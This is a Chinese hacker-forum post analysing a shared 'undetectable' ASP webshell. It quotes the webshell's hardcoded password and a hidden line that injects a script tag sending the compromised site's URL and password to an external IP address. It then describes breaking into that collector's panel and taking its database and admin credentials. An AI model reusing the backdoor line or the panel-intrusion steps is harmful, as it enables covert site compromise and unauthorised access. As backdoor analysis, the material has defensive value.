搜索
中国白客联盟»论坛 Passion irrigation 业界新闻(Industry News) 黑吃黑:优雅爆菊小黑webshell后门箱子
返回列表 发新帖
查看: 7931|回复: 0

黑吃黑:优雅爆菊小黑webshell后门箱子

[复制链接]
admin

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-6-15 11:37:07 | 显示全部楼层 |阅读模式
前因:

640?wx_fmt=png.jpg

在群内看到有人分享免杀木马

第一感觉哪有这种好事,于是下载下来开始分析

640?wx_fmt=png.jpg

用编辑器打开开始读代码

我们可以看到第三行代码如下:

640?wx_fmt=png.jpg

代码为:
UserPass="admin123"  '密码

一般WEB端后门大多都是会发送当前webshell地址+密码然后到webshell箱子,直接跟随UserPass变量

640?wx_fmt=png.jpg

代码内容为:
j"<script src=""http://121.50.168.146:8080/api.asp?url="&server.URLEncode("""http://"&request.ServerVariables("HTTP_HOST")&request.ServerVariables("url"))&"&pass="&UserPass&"""></script>"

后门地址为:
http://121.50.168.146:8080/

接收参数就是当前URL地址+密码,直接GET传输到api.asp

640?wx_fmt=png.jpg

后门是早已泛滥的孤狼webshell箱子系统。


此箱子存在各种xss漏洞,随便插一下拿到cookie就可以进后台。但是我们不需要这么麻烦。


640?wx_fmt=png.jpg


直接下载数据库,然后爆菊花,后台管理账户密码如下:

640?wx_fmt=png.jpg

webshell箱子数据如下:

640?wx_fmt=png.jpg

欢迎吐槽
        路人甲:妈蛋好歹后门地址接收的加密一下啊!
        路人乙:LOW B后门,被搞是迟早的事情。

文章出处:全球被黑站点统计

webshell, 黑吃黑, 箱子, 优雅

相关帖子

过段时间可能会取消签到功能了
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表